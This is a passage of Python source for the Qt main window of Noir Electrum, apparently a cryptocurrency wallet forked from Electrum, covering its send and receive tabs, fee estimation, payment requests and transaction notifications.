host = self.network.get_parameters().host
self.pay_to_URI('noir:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Noir Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Noir Electrum's focus is speed, with low resource usage and simplifying Noir.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Noir system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/noirofficial/electrum/issues\">https://github.com/noirofficial/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Noir Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Noir Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Noir Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Noir Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Noir address where the payment should be received. Note that each payment request uses a different Noir address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Noir addresses.'),
_('The Noir address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Noir address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(self.amount_e.width())
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Noir transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Noir Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
